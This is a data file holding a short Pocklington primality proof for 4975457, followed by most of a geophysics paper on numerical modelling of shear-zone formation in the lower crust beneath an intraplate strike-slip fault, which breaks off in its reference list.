[ "Primality proof for n = 4975457:\n\nTake b = 2.\n\nb^(n-1) mod n = 1.\n\n1747 is prime.\nb^((n-1)/1747)-1 mod n = 3301997, which is a unit, inverse 3640192.\n\n89 is prime.\nb^((n-1)/89)-1 mod n = 4668116, which is a unit, inverse 797003.\n\n(89 * 1747) divides n-1.\n\n(89 * 1747)^2 > n.\n\nn is prime by Pocklington's theorem." ]
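The certificate above can be checked mechanically; a short sketch that verifies each stated condition:

```python
from math import gcd

n, b = 4975457, 2
F = 89 * 1747                       # fully factored part of n - 1

assert pow(b, n - 1, n) == 1        # b^(n-1) mod n = 1
assert (n - 1) % F == 0             # (89 * 1747) divides n - 1
assert F * F > n                    # (89 * 1747)^2 > n

for q in (1747, 89):                # each prime factor q of F
    assert gcd(pow(b, (n - 1) // q, n) - 1, n) == 1   # b^((n-1)/q) - 1 is a unit mod n

print("n is prime by Pocklington's theorem")
```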
https://earth-planets-space.springeropen.com/articles/10.1186/s40623-017-0668-5
[ "# Shear strain concentration mechanism in the lower crust below an intraplate strike-slip fault based on rheological laws of rocks\n\n• 1836 Accesses\n\n• 3 Citations\n\n## Abstract\n\nWe conduct a two-dimensional numerical experiment on the lower crust under an intraplate strike-slip fault based on laboratory-derived power-law rheologies considering the effects of grain size and water. To understand the effects of far-field loading and material properties on the deformation of the lower crust on a geological time scale, we assume steady fault sliding on the fault in the upper crust and ductile flow for the lower crust. To avoid the stress singularity, we introduce a yield threshold in the brittle–ductile transition near the down-dip edge of the fault. Regarding the physical mechanisms for shear strain concentration in the lower crust, we consider frictional and shear heating, grain size, and power-law creep. We evaluate the significance of these mechanisms in the formation of the shear zone under an intraplate strike-slip fault with slow deformation. The results show that in the lower crust, plastic deformation is possible only when the stress or temperature is sufficiently high. At a similar stress level, $$\\sim$$100 MPa, dry anorthite begins to undergo plastic deformation at a depth around 28–29 km, which is about 8 km deeper than wet anorthite. As a result of dynamic recrystallization and grain growth, the grain size in the lower crust may vary laterally and as a function of depth. A comparison of the results with constant and non-constant grain sizes reveals that the shear zone in the lower crust is created by power-law creep and is maintained by dynamically recrystallized material in the shear zone because grain growth occurs in a timescale much longer than the recurrence interval of intraplate earthquakes. Owing to the slow slip rate, shear and frictional heating have negligible effects on the deformation of the shear zone. The heat production rate depends weakly on the rock rheology; the maximum temperature increase over 3 Myr is only about several tens of degrees.\n\n## Introduction\n\nDuctile shear zones are believed to exist in the lower crust below interplate strike-slip faults on the basis of various observational, experimental, and theoretical studies as well as geological observations of exhumed shear zones. Thermal weakening due to shear heating has been considered as an important process for the development and maintenance of shear zones (e.g., Yuen et al. 1978; Fleitout and Froidevaux 1980). Observation of the broadly distributed heat flow anomaly on the San Andreas Fault (see Lachenbruch and Sass 1980) has been explained by shear heating in the lower crust. The temperature anomaly in the lower crust can reach several hundred degrees, which can create an observable heat flow anomaly on the surface (e.g., Thatcher and England 1998; Leloup et al. 1999; Takeuchi and Fialko 2012). A large temperature anomaly can result in a weak zone with low seismic velocity that can be observed as a heterogeneous velocity structure in the seismic tomography data (Wittlinger et al. 1998). Furthermore, mylonite outcrops of exhumed faults (White et al. 1980) provide direct evidence for the existence of ductile shear zones in the lower crust under interplate (e.g., Rutter 1999; Little et al. 2002) and intraplate faults (e.g., Shimada et al. 2004; Fusseis et al. 
2006; Takahashi 2015).\n\nCompared with interplate faults, intraplate strike-slip faults have much smaller slip rates, at <1 mm/year, and their age is much younger in the Japanese Islands (less than 3 Myr; Doke et al. 2012). However, heterogeneous structures beneath intraplate strike-slip faults observed by seismic tomography (e.g., Nakajima and Hasegawa 2007; Nakajima et al. 2010) and magnetotelluric survey (e.g., Ogawa and Honkura 2004; Yoshimura et al. 2009) suggest the existence of localized weak zones in the lower crust just below intraplate active faults (Iio et al. 2002, 2004). The spatial resolution of these observations is insufficient to resolve the structures of such ductile shear zones. Therefore, understanding the mechanisms that lead to shear strain concentration in the lower crust beneath an intraplate strike-slip is an important step in understanding the deformation of the crust.\n\nIn this study, we construct a series of numerical models on the deformation in the lower crust below an active intraplate strike-slip fault based on laboratory-derived rheological laws. We simulate the evolution of viscosity and deformation patterns of the lower crust beneath an immature intraplate strike-slip fault on a geological timescale. We consider three mechanisms of strain localization: shear and fault frictional heating, grain size reduction, and power-law creep. The effect of water is quantitatively evaluated with water fugacity. We discuss the role of shear strain concentration mechanisms and boundary conditions in the development of the shear zone. In addition, we compare the shear zones beneath intraplate and interplate strike-slip faults to identify the controlling factors for lower crustal shear localization under intraplate strike-slip faults.\n\n## Model description\n\nWe simulated the deformation of the lower crust beneath an intraplate strike-slip fault by applying a velocity boundary condition representing far-field loading. We solved the stress equilibrium equation and the heat flow equation for a thermo-mechanical coupled model, and we used laboratory-derived rheological laws to control the behavior of rocks.\n\n### Model geometry\n\nThe model domain is 35 km thick in the vertical (z) direction and 30 km wide in the fault-normal (x) direction. The Mohorovičić (Moho) discontinuity is represented by a horizontal boundary at a depth of 35 km. Following Thatcher and England (1998), we considered the problem in a 2-D plane perpendicular to the fault trace, as shown in Fig. 1. We assumed two layers: a rigid upper crust and a ductile lower crust, and the entire crust is composed of wet or dry anorthite. In the upper crust where brittle failure is the dominant mode of deformation, an infinitely long vertical creeping fault is assumed with the fault strike parallel to the y-axis. The lower crust is deformed by plastic flow, and there is a semi-brittle regime between the upper and the lower crust. The lower boundary of the semi-brittle regime is the brittle–ductile transition (BDT), the depth of which depends on the assumption of crustal rheology (Table 1). 
Considering the symmetry of the vertical strike-slip fault, our model region includes only one side of the fault bounded by the surface and a vertical plane of bilateral symmetry, which is taken to be the center of the shear zone.\n\n### Rheology\n\nThe constitutive relation for the plastic flow of rocks is described as follows (e.g., Bürgmann and Dresen 2008):\n\n\\begin{aligned} \\dot{\\varepsilon } = A \\tau _{{\\rm s}}^{n} L^{-m} f_{{\\rm H_{2}O}}^{r} {{\\rm exp}}\\left(-\\dfrac{Q+pV}{RT} \\right) , \\end{aligned}\n(1)\n\nwhere $$\\tau _{\\rm s}$$ is the maximum shear stress given by the square root of the second deviatoric stress invariant. L is the grain size. $$f_{{\\rm H_{2}O}}$$ is water fugacity. Q and V are activation energy and activation volume, respectively. R is the universal gas constant. p is pressure, and A, n, m, r are material constants. The laboratory-derived parameters for anorthite are summarized in Table 2. Regarding the physical mechanism of plastic flow, in this study, we considered both diffusion creep and dislocation creep. For a given mineral, we assume that the same shear stress controls the two deformation mechanisms (e.g., Gueydan et al. 2001; Montési and Hirth 2003). Under this assumption, the total strain rate $$\\dot{\\varepsilon }_{\\rm total}$$ is expressed as the sum of the diffusion creep strain rate $$\\dot{\\varepsilon }_{\\rm diff}$$ and the strain rate caused by dislocation creep $$\\dot{\\varepsilon }_{\\rm disl}$$.\n\n\\begin{aligned} \\dot{\\varepsilon }_{{\\rm total}}=\\dot{\\varepsilon }_{{\\rm diff}}+ \\dot{\\varepsilon }_{{\\rm disl}} \\end{aligned}\n(2)\n\nOne can define the effective viscosity, such that\n\n\\begin{aligned} \\eta _{{\\rm eff}}=\\dfrac{\\tau _{s}}{\\dot{\\varepsilon }_{{\\rm total}}}. \\end{aligned}\n(3)\n\nThe grain size in this study is assumed following the model proposed by Bresser et al. (1998), who argued that grain growth occurs in the diffusion creep regime to increase the grain size to a size sufficient for dislocation creep to occur and dynamic recrystallization in dislocation creep regime leads to a grain size small enough for diffusion creep to occur. They postulated that the grain size is determined by the equation for Equilibrium Grain Size ($$L_{{\\rm EGS}}$$):\n\n\\begin{aligned} \\dot{\\varepsilon }_{{\\rm diff}}(T,p,\\tau ,L)=\\dot{\\varepsilon }_{{\\rm disl}}(T,p,\\tau ) \\end{aligned}\n(4)\n\nwhere T is temperature, p is pressure,$$\\tau$$ is shear stress, and L is grain size. Combining Eqs. 1 and 4, we can obtain the expression for $$L_{{\\rm EGS}}$$, which is a function of temperature and shear stress:\n\n\\begin{aligned} L_{{\\rm EGS}}=\\left[ \\dfrac{A_{{\\rm diff}}}{A_{{\\rm disl}}\\tau ^{n_{{\\rm disl}}-1}_{s}} {{\\rm exp}}\\left(\\dfrac{Q_{{\\rm disl}}+pV_{{\\rm disl}}-Q_{{\\rm diff}}-pV_{{\\rm diff}}}{RT}\\right) \\right] ^{\\dfrac{1}{m_{{\\rm diff}}}} \\end{aligned}\n(5)\n\nThe subscript diff and disl refer to the rheological parameters for diffusion creep and dislocation creep in Table 2. From this assumption, we expect a large variation in grain size under the thermal and stress conditions of the lower crust (Fig. 2). We also tested a case of a Constant Grain Size ($$L_{\\rm CGS}$$) of 500 $$\\upmu {\\mathrm{m}}$$ for comparison.\n\nFor wet rheology (r = 1), the effect of water weakening is evaluated with water fugacity $$f_{{\\rm H_{2}O}}$$. 
The fugacity of a gaseous species at any temperature (T) and pressure (p) can be calculated from the equation of state using the following equation (Karato 2012):\n\n\\begin{aligned} \\log \\dfrac{f(p,T)}{p}=\\dfrac{1}{RT} \\lim _{p_{0} \\rightarrow 0} \\int _{p_{0}}^{p} \\left(V_{{\\rm m}}(p^{\\prime},T)-V_{{\\rm m}}^{{\\rm id}}(p^{\\prime},T)\\right) dp^{\\prime}. \\end{aligned}\n(6)\n\nwhere $$V_{\\rm m}$$ and $$V_{\\rm m}^{\\rm id}$$ is molar volume of an real gas and an ideal gas, respectively. For real gas, we use van der Waals equation of state: $$p=\\dfrac{RT}{V_{{\\rm m}}-b}-\\dfrac{a}{V_{{\\rm m}}^{2}}$$. The van der Waals constants a and b of water ($${\\mathrm{H}}_2\\mathrm{O}$$) are $$5.537\\times 10^{-1} \\mathrm{m}^{6}\\,\\mathrm{Pa\\, mol}^{-2}$$ and $$3.049 \\times 10^{-5} \\mathrm{m}^{3}\\,\\mathrm{mol}^{-1}$$, respectively. $$V_{\\rm m}$$ in term $$\\dfrac{a}{V_{m}^{2}}$$ can be approximated as $$\\dfrac{RT}{p}$$ as ideal gas. Then, $$V_{{\\rm m}}$$ can be calculated as $$V_{{\\rm m}}=\\dfrac{R^{3}T^{3}}{pR^{2}T^{2}+ap^{2}}+b.$$ Integrating Eq. 6 using the equation of state for real gas and ideal gas and substitute p and $$p_{0}$$ for $$p^{\\prime}$$. Let $$p_{0}=0$$, one obtains the expression for fugacity,\n\n\\begin{aligned} f(p,T)=\\dfrac{pR^{2}T^{2}}{R^{2}T^{2}+{{\\rm ap}}}{{\\rm exp}}\\left(\\dfrac{bp}{RT}\\right) . \\end{aligned}\n(7)\n\n### Initial and boundary conditions\n\nBecause we consider an infinitely long strike-slip fault that cuts through the entire upper crust and terminates in the lower crust, there is no vertical motion. Far-field horizontal velocity $$v_{0}$$ is half of the total relative velocity. $$v_{0}$$ is assumed to be 0.5 and 15 mm/year for intraplate and interplate faults, respectively, and it is applied from surface to the depth of $$z_{{\\rm b}}$$ and on the far-field boundaries. We assume the fault strength in the brittle fracture regime on the basis of Byerlee’s law (Byerlee 1978):\n\n\\begin{aligned} \\tau _{f} = {\\left\\{ \\begin{array}{ll} 0.85 \\sigma _{{\\rm n}} &{} (\\sigma _{{\\rm n}}<200\\, [\\text{MPa}]) \\\\ 50+0.6\\sigma _{{\\rm n}} &{}(200\\, [\\text{MPa}]<\\sigma _{{\\rm n}}<1700\\, [\\text{MPa}]), \\end{array}\\right. } \\end{aligned}\n(8)\n\nwhere $$\\tau _{{\\rm f}}$$ is frictional strength and $$\\sigma _{{\\rm n}}$$ is normal stress. The strength of a material in the plastic flow regime is highly sensitive to temperature, as shown in Eq. 1. In this model, we assume that the brittle fracture and plastic flow occur independently; as a result, the mechanism that gives a lower strength becomes the dominant mechanism of deformation. The transition conditions for brittle fracture to plastic flow (brittle–ductile transition, BDT) are given by\n\n\\begin{aligned} \\tau _{yx}=\\dfrac{1}{2}\\eta _{{\\rm eff}}\\dfrac{\\partial v}{\\partial x}= \\tau _{{\\rm f}}. \\end{aligned}\n(9)\n\nShear stress $$\\tau _{yx}$$ is solved from the model of plastic flow using different model configurations (Table 1), and $$\\tau _{{\\rm f}}$$ is the fault frictional strength. The shear strain rate ($$\\dot{\\varepsilon }_{yx}$$) is solved from Eq. 9. At the depth shallower than the depth of BDT, we apply stress boundary condition on the fault that the flow stress is equal to the fault frictional strength (Fig. 3b). The fault gradually terminates as slip decreases with depth. At the depth of BDT, the slip rate is 0. 
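A small numerical sketch of the water fugacity expression in Eq. (7) above, using the van der Waals constants quoted earlier (the pressure and temperature in the example are illustrative values only, and the flow-law parameters of Table 2 are not evaluated here):

```python
import math

R = 8.314        # gas constant [J mol^-1 K^-1]
a = 5.537e-1     # van der Waals a for H2O [m^6 Pa mol^-2]
b = 3.049e-5     # van der Waals b for H2O [m^3 mol^-1]

def water_fugacity(p, T):
    """Eq. (7): f(p, T) = p R^2 T^2 / (R^2 T^2 + a p) * exp(b p / (R T))."""
    return p * R**2 * T**2 / (R**2 * T**2 + a * p) * math.exp(b * p / (R * T))

# Illustrative lower-crustal condition: ~25 km depth with a 25 K/km gradient and an
# assumed lithostatic pressure of ~700 MPa (the pressure value is not from the paper).
p = 700e6                      # Pa
T = 273.15 + 25.0 * 25.0       # K
print(f"f_H2O = {water_fugacity(p, T) / 1e6:.0f} MPa at p = {p/1e6:.0f} MPa, T = {T:.0f} K")
```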
Slip rate at semi-brittle regime can be calculated by the integral of the shear strain rate ($$\\dot{\\varepsilon }_{yx}$$) over the entire domain in the x-direction. At depths greater than the BDT, no brittle fracture occurs, and the deformation is fully plastic. The velocity on the vertical plane of bilateral symmetry is zero. On the crust/mantle boundary, the boundary condition is $${{\\rm d}}v/{{\\rm d}}z = 0$$.\n\nThe initial temperature is assumed with a uniform thermal gradient of 25 K/km (Table 3). The temperature of the Earth's surface is fixed to 0 °C. Zero heat flux at the vertical boundaries and a constant heat flux ($$0.065\\,\\hbox{W m}^{-2}$$) at the Moho is assumed.\n\n### Thermo-mechanical coupling model\n\nIn our model, all mechanical energy is dissipated in heat and represents a source term in the heat flow equation:\n\n\\begin{aligned} \\rho C_{{\\rm p}} \\dfrac{\\partial T}{\\partial t}=k \\left( \\dfrac{\\partial ^{2} T}{\\partial x^{2}}+\\dfrac{\\partial ^{2}T}{\\partial z^{2}} \\right) +H_{{\\rm s}}+H_{{\\rm f}}, \\end{aligned}\n(10)\n\nwhere the change in temperature T is a summation of thermal diffusion (k is the thermal conductivity) and volumetric heat generated by shear heating ($$H_{{\\rm s}}$$) and frictional heating ($$H_{{\\rm f}}$$). $$\\rho$$ is the density, and $$C_{{\\rm p}}$$ is the specific heat capacity at constant pressure. The heat produced by shear per unit time and volume is given by\n\n\\begin{aligned} H_{{\\rm s}}=\\tau _{ij}\\dot{\\varepsilon }_{ij}. \\end{aligned}\n(11)\n\nThe heat produced by friction is approximated by the volumetric heating on a column of the grid closest to the fault (Leloup et al. 1999):\n\n\\begin{aligned} H_{{\\rm f}}=\\tau _{{\\rm f}}\\dfrac{v_{0}}{\\Delta x}, \\end{aligned}\n(12)\n\nwhere $$\\tau _{{\\rm f}}$$ is the frictional resistance defined in Eq. 8 and $$\\Delta x$$ is the width along the x-axis of the considered unit cell. We solved the heat flow equation in a 2-D space perpendicular to the fault (Fig. 1). In each time step, we assumed that the velocity is constant in time, and we solved the stress equilibrium equation for the velocity field. Because motion is purely horizontal, the only nonzero components of the stress are $$\\tau _{yx}$$ and $$\\tau _{yz}$$:\n\n\\begin{aligned} \\dfrac{\\partial \\tau _{yx}}{\\partial x}+\\dfrac{\\partial \\tau _{yz}}{\\partial z} =0. \\end{aligned}\n(13)\n\nAll numerical calculations in this study were performed by using MATLAB. We used the Partial Differential Equation Toolbox to solve the mechanical equations, and we used the Alternating Direction Implicit finite difference method to solve the heat flow equation. The calculations were performed on a grid containing 700 $$\\times$$ 600 (420,000) cells, each of which is 50 m in both of its width and height directions. Although a finer grid could give a more accurate solution, the overall pattern of the solutions is insensitive to the chosen grid size, as confirmed by simulations using a finer grid with a half grid size. We simulated the fault slip and temperature evolution by using the adaptive time step (e.g., Thatcher and England 1998) controlled by the amount of heat production. We calculated the temperature rise during 3 Myr because the initiation ages of active faulting in the inland areas of Japan are mostly less than 3 Myr (Doke et al. 2012).\n\n## Results\n\nEffective viscosity of a rock depends on several environmental conditions such as shear stress, grain size, and temperature. 
In this section, we present the calculation results of shear stress and grain size distribution obtained by applying a 1-D linear geothermal gradient to evaluate the effects of grain size and power-law rheology. Moreover, we show the temperature anomaly produced by shear and frictional heating and the effective viscosity distribution.\n\n### Shear stress\n\nAs shown in Fig. 3b, the shear stress $$\\tau _{yz}$$ becomes very large ($${>}700$$ MPa) around point $$x = 0, z = z_{b}$$. This is because the effective viscosity is extremely large in the semi-brittle regime and the elasticity of rock has not been considered in this study. As the depth increases, $$\\tau _{yz}$$ quickly decreases. At the depth greater than the depth of BDT, $$\\tau _{yz}$$ becomes negligible compared with $$\\tau _{yx}$$, and the maximum shear stress $$\\tau _{{\\rm s}}$$ is nearly equal to $$\\tau _{yx}$$. Therefore, the distribution of maximum shear stress in the lower crust below the BDT is considered to be a result of far-field loading and we focus our discussion to the lower crust below BDT.\n\nFigure 4 shows the distribution of the maximum shear stress in the lower crust for our 6 cases. The depth of the BDT is different in each case, as is shown by gray broken lines in Figure 4. Compared with the wet anorthite, the dry anorthite requires a higher temperature to cause plastic deformation. The brittle region extends deeper into the crust (28–29 km depth), and the BDT for the dry anorthite case is about 8 km deeper than the cases of wet anorthite. Therefore, $$z_{{\\rm b}}$$ was set at a depth of 25 km for the model with dry anorthite. In the case of interplate strike-slip faults (Fig. 4c, f), the shear stress is only slightly larger, and the BDT is about 2 km deeper than that for intraplate cases (Fig. 4a, d). However, the slip rate of an interplate strike-slip fault is 30 times larger than that of an intraplate strike-slip fault. Therefore, the shear stress in the lower crust and the depth of the BDT is not sensitive to the fault slip rate. Shear stress concentrates around the down-dip extension of the fault. The largest shear stress is located at the depth of the BDT. Shear stress drops with depth and distance from the fault.\n\n### Grain size distribution\n\nWe calculated $$L_{{\\rm EGS}}$$ by balancing the shear strain rate of diffusion creep and dislocation creep. As examples, $$L_{{\\rm EGS}}$$ obtained by the model W1E and model D1E with an initial temperature field is shown in Fig. 5. Small grains are located in highly sheared region because both $$L_{{\\rm EGS}}$$ and shear strain rate depend on temperature and shear stress (Eq. 5 and Fig. 4). In our models, the minimum grain sizes are located at the depth of BDT under the fault where shear stress becomes the largest, nearly equal to the frictional strength of the fault. In models W1E and D1E, the minimum grain sizes are $$\\sim$$215 and $$\\sim$$17 $$\\upmu \\mathrm{m}$$ at temperatures of $$\\sim$$475 and $$\\sim$$700 $$^\\circ$$C, respectively. The results of grain size measurements show that the plagioclase grains in ultramylonites have a mean diameter of 16 (Okudaira et al. 2015) and 85 $$\\upmu \\mathrm{m}$$ (Okudaira et al. 2017) under the condition of $$\\sim$$700 and $$\\sim$$600 $$^\\circ$$C, respectively. Although our results of EGS are in agreement with these observations, comparison of the calculated results with the field observations is not straightforward. 
For example, the shear stress on the fault could be smaller than that estimated from Byerlee's law (Iio 1997). Also, even under the same temperature and stress conditions, the dynamically recrystallized grain size may still be larger than $$L_{{\rm EGS}}$$ (Bresser et al. 2001).

Outside the narrow mylonite zone, materials with relatively coarse grain sizes (up to a few centimeters) are exposed over a wide area (e.g., Markl 1998). Our calculation with EGS provides a fairly reasonable grain size distribution. However, in the far field where both temperature and shear stress are low, the calculated $$L_{{\rm EGS}}$$ reaches several tens of centimeters, which is not realistic. This result may be ascribed to our assumption of instantaneous grain growth following the equation for $$L_{{\rm EGS}}$$. The mechanisms that limit grain size, such as the Zener pinning effect (e.g., Hillert 1988; Rohrer 2010), are not considered in this study.

### Shear and frictional heating

Figure 6 shows the temperature anomalies 3 Myr after shearing and fault sliding were initiated. Assuming wet anorthite rheology for the lower crust, the maximum temperature increases for models W1E and W30E are about 15 and 219 K, respectively. The temperature increase for the case of an intraplate strike-slip fault is much lower than that for an interplate strike-slip fault. The temperature change is largely controlled by frictional heating. The temperature rise creates a peak heat flow anomaly at the fault trace. For an interplate strike-slip fault, the peak heat flow anomaly is $$\sim$$55 $$\hbox{mW/m}^2$$ above the background heat flow of 65 $$\hbox{mW/m}^2$$ (Fig. 7b). In contrast, for an intraplate strike-slip fault, the expected heat flow anomaly is very small, less than 5% of the background value. Therefore, we cannot expect to detect a heat flow anomaly for the intraplate case (Tanaka et al. 2004). To illustrate how rock rheology affects the temperature increase, we also performed a calculation using dry anorthite (strong rheology). Figure 6b shows that the maximum temperature increase for the D1E model is about 22 K, which is higher than that for the wet anorthite case but still insufficient to cause an observable heat flow anomaly at the surface.

### Effective viscosity

The effective viscosity structure strongly depends on the assumptions applied in the calculation, as shown in Fig. 8. For the intraplate cases, the effective viscosity is about $$10^{22.5}$$ Pa s at the BDT under the fault. For the interplate case, in which the shear strain rate and shear stress are higher than those in the intraplate cases, the effective viscosity (Fig. 8c) becomes as small as about $$10^{21}$$ Pa s at the BDT under the fault.

The effective viscosity of dislocation creep is extremely high when the stress is relatively small. In models assuming EGS, dislocation creep and diffusion creep had the same effective viscosity in our calculation. The effective viscosity in the far field and at the top of the lower crust is larger than $$10^{25}$$ Pa s because of the relatively low temperature and small stress. In these regions, rocks behave like a rigid body.

On the other hand, in models assuming CGS, diffusion creep becomes the dominant deformation mechanism where the stress is relatively small. Owing to the linear geothermal gradient, the effective viscosity has a layered structure in the far field. In the shear zone, where the stress is large, dislocation creep dominates. The broken lines in Fig. 8d–f show the locations at which dislocation creep and diffusion creep with a grain size of 500 $$\upmu \mathrm{m}$$ contribute equally. Dislocation creep dominates on the left side, and diffusion creep dominates on the right side, of the broken line.

A comparison of wet and dry anorthite shows that the effective viscosity is significantly lowered by the presence of water. In previous studies of interplate strike-slip faults (e.g., Takeuchi and Fialko 2013; Moore and Parsons 2015), by contrast, the effective viscosities for wet and dry rheologies have similar magnitudes in the center of the shear zone owing to the elevated temperature field. This is not the case for an intraplate strike-slip fault, because the change in effective viscosity structure due to shear and frictional heating is negligible.

## Discussion

In this section, we discuss the relative importance of candidate mechanisms for the formation and maintenance of the shear zone in the lower crust beneath an intraplate strike-slip fault.

Shear heating, as well as frictional heating, has been considered a main cause of the lower crustal shear zone beneath a fault and the associated heat flow anomaly for interplate strike-slip faults such as the San Andreas Fault (e.g., Lachenbruch and Sass 1980; Leloup et al. 1999). We compared the shear strain rate obtained from the temperature field at 3 Myr (solid line in Fig. 9) and that obtained from the initial temperature field (broken line in Fig. 9). For the interplate strike-slip fault, a significant increase in temperature occurred around the fault tip at a depth of about 12 km (Fig. 6c). Our result of temperature increase in model W30E is consistent with the results of recent thermo-mechanical models of interplate strike-slip faults (e.g., Takeuchi and Fialko 2012; Moore and Parsons 2015). The maximum temperature increase in the cases of wet rheologies is $$\sim$$200 °C, and the effective viscosity was significantly lowered by the increased temperature. A comparison with the shear strain rate obtained with the 1-D linear geothermal gradient revealed that the shear zone became narrower and the depth of the BDT became shallower (Fig. 9b) after the temperature increased, which indicates that the depths of the BDT for interplate strike-slip faults are time dependent.

On the contrary, for the case of the intraplate strike-slip fault (Fig. 9a), the change in shear strain rate during 3 Myr was negligible because the temperature increase was minimal ($$\sim$$20/650 K). Thus the effect of shear and frictional heating on the long-term (geological time scale) thermal structure is negligible for intraplate strike-slip faults. We conclude that such heating is not the main cause of the formation of the shear zone under intraplate faults.

The amount of heat generated by shear and frictional heating can be increased by the absence of water. In the previous studies (e.g., Takeuchi and Fialko 2012; Moore and Parsons 2015), the temperature increase in the cases of dry rheologies is about 200 °C higher than that in the cases of wet rheologies. In our study, the effect of water on the temperature increase is not significant because the maximum shear strain rate (Fig. 10) and shear stress (Fig. 4) are insensitive to the rock rheology. Instead, the increase in the BDT depth due to the absence of water is ~8 km, which is equivalent to a temperature increase of ~200 °C.

In the current model, the degree of shear strain concentration was influenced by the assumed rheology. Deformation was more localized in the cases of power-law fluid (Fig. 10a, b) than in the case of Newtonian fluid (Fig. 10c). A comparison of the results of models W1E and W1C revealed that the shear strain rate distributions are similar in the shear zone, implying that, in the current study, the assumption of grain size does not affect shear strain concentration. Therefore, weakening due to power-law rheology is the most important mechanism in the formation of the shear zone in the lower crust. However, it should be noted that we only consider diffusion creep as a grain size dependent creep in this study. In fine-grained mylonites, deformation mechanisms other than diffusion creep, such as grain boundary sliding (Boullier and Gueguen 1975; White 1979), could occur to further reduce the strength of rocks and enhance shear strain localization.

Once a shear zone has been formed in the lower crust, the strength heterogeneity produced by the material with small grain sizes will remain over a geological time scale ($${\sim}10^{8}$$ years, Tullis and Yund 1982). The mylonites commonly observed near exhumed shear zones (White et al. 1980) show evidence for such long-lived weak zones beneath intraplate faults. Thus, lower shear strength is maintained by materials with small grain sizes, and strain localization should be a common feature of many active faults.

In the far field, although the shear strain rate in the W1C model was larger than that in W1E, the shear stress in the cases of CGS is smaller than that in the cases of EGS because the effective viscosity is significantly lowered by diffusion creep. Because the shear strain rate in the far field is much smaller than that in the shear zone, the deformation in the far field has almost no influence on the deformation in the localized shear zone.

A simplifying assumption in our calculation is that EGS is achieved instantaneously, which may not be realistic. According to the model of Bresser et al. (1998), grain size evolves toward EGS depending on the strain rate at each location. Since the strain rate distribution in our calculation does not change significantly with time, the resulting EGS can be considered the result of long-term steady-state deformation. Our results demonstrate that relative motion across an intraplate fault, no matter how slow it is, can create a characteristic grain size distribution and corresponding strain localization in the lower crust. The model also predicts that lower crustal rocks in the far field should behave like a rigid body. Studies of post-seismic deformation showed that plastic flow in the lower crust after the 1992 Landers and 1999 Hector Mine earthquakes was not significant (Pollitz 2001; Freed et al. 2007). Our result of the effective viscosity structure with the EGS assumption is in good agreement with such observations because, in that case, plastic deformation is limited to a narrow shear zone under the fault.

For interplate strike-slip faults, Savage and Burford (1973) proposed a kinematic model with a buried dislocation in an elastic half-space; this model has been used to explain geodetically observed interseismic strain accumulation. For intraplate strike-slip faults, a similar dislocation model has been applied and yielded a reasonable estimate of the fault-locking depth (e.g., Ohzono et al. 2011). The current model demonstrates that such a localized shear zone appears even in an intraplate case with a very low slip rate.
This provides a physical basis for the applicability of the Savage and Burford (1973) model to intraplate strike-slip faults.

## Conclusion

We have considered the formation and maintenance of the shear zone under an intraplate strike-slip fault. Models that incorporate laboratory-derived temperature-dependent power-law rheology, grain size, and shear and frictional heating are examined to understand the mechanism and boundary conditions that influence the deformation of the lower crust. Water is very important in reducing the temperature required for plastic deformation in the lower crust: for wet anorthite, deformation is fully plastic at a temperature of $$\sim$$475 °C, whereas for dry anorthite it is $$\sim$$700 °C. The temperature anomaly owing to 3 Myr of heat generation on an intraplate strike-slip fault is negligibly small. In our model, dynamically recrystallized materials with small grain sizes are important for maintaining a shear zone on a geological time scale of $${\sim}10^{8}$$ years. The degree of shear strain concentration is controlled by the weakening effect due to the nonlinear relation between shear strain rate and stress (power-law rheology).

## Abbreviations

BDT: brittle–ductile transition

diff.: diffusion creep

disl.: dislocation creep

EGS: equilibrium grain size

CGS: constant grain size

## References

1. Boullier A, Gueguen Y (1975) Sp-mylonites: origin of some mylonites by superplastic flow. Contrib Mineral Petrol 50(2):93–104

2. Bürgmann R, Dresen G (2008) Rheology of the lower crust and upper mantle: evidence from rock mechanics, geodesy, and field observations. Ann Rev Earth Planet Sci 36(1):531

3. Byerlee JD (1978) Friction of rocks. Pure Appl Geophys 116(4–5):615–626

4. De Bresser J, Peach C, Reijs J, Spiers C (1998) On dynamic recrystallization during solid state flow: effects of stress and temperature. Geophys Res Lett 25(18):3457–3460

5. De Bresser J, Ter Heege J, Spiers C (2001) Grain size reduction by dynamic recrystallization: Can it result in major rheological weakening? Int J Earth Sci 90(1):28–45

6. Doke R, Tanikawa S, Yasue K, Nakayasu A, Niizato T, Umeda K, Tanaka T (2012) Spatial patterns of initiation ages of active faulting in the Japanese Islands. Active Fault Res 37:1–15

7. Fleitout L, Froidevaux C (1980) Thermal and mechanical evolution of shear zones. J Struct Geol 2(1–2):159–164

8. Freed AM, Bürgmann R, Herring T (2007) Far-reaching transient motions after Mojave earthquakes require broad mantle flow beneath a strong crust. Geophys Res Lett 34(19):L19302

9. Fusseis F, Handy M, Schrank C (2006) Networking of shear zones at the brittle-to-viscous transition (Cap de Creus, NE Spain). J Struct Geol 28(7):1228–1243

10. Gueydan F, Leroy YM, Jolivet L (2001) Grain-size-sensitive flow and shear-stress enhancement at the brittle-ductile transition of the continental crust. Int J Earth Sci 90(1):181–196

11. Hillert M (1988) Inhibition of grain growth by second-phase particles. Acta Metall 36(12):3177–3181

12. Iio Y (1997) Frictional coefficient on faults in a seismogenic region inferred from earthquake mechanism solutions. J Geophys Res Solid Earth 102(B3):5403–5412

13. Iio Y, Sagiya T, Kobayashi Y, Shiozaki I (2002) Water-weakened lower crust and its role in the concentrated deformation in the Japanese Islands. Earth Planet Sci Lett 203(1):245–253

14.
Iio Y, Sagiya T, Kobayashi Y (2004) Origin of the concentrated deformation zone in the japanese islands and stress accumulation process of intraplate earthquakes. Earth Planets Space 56(8):831–842\n\n15. Karato S (2012) Deformation of earth materials. An introduction to the rheology of solid earth, Chap 212. Cambridge University Press, Cambridge\n\n16. Lachenbruch AH, Sass J (1980) Heat flow and energetics of the San Andreas Fault Zone. J Geophys Res Solid Earth (1978–2012) 85(B11):6185–6222\n\n17. Leloup PH, Ricard Y, Battaglia J, Lacassin R (1999) Shear heating in continental strike-slip shear zones: model and field examples. Geophys J Int 136(1):19–40\n\n18. Little T, Holcombe R, Ilg B (2002) Kinematics of oblique collision and ramping inferred from microstructures and strain in middle crustal rocks, central Southern Alps, New Zealand. J Struct Geol 24(1):219–239\n\n19. Markl G (1998) The Eidsfjord anorthosite, Vesterålen, Norway: field observations and geochemical data. Norges Geologiske Undersokelse 434:53–76\n\n20. Montési LG, Hirth G (2003) Grain size evolution and the rheology of ductile shear zones: from laboratory experiments to postseismic creep. Earth Planet Sci Lett 211(1):97–110\n\n21. Moore JD, Parsons B 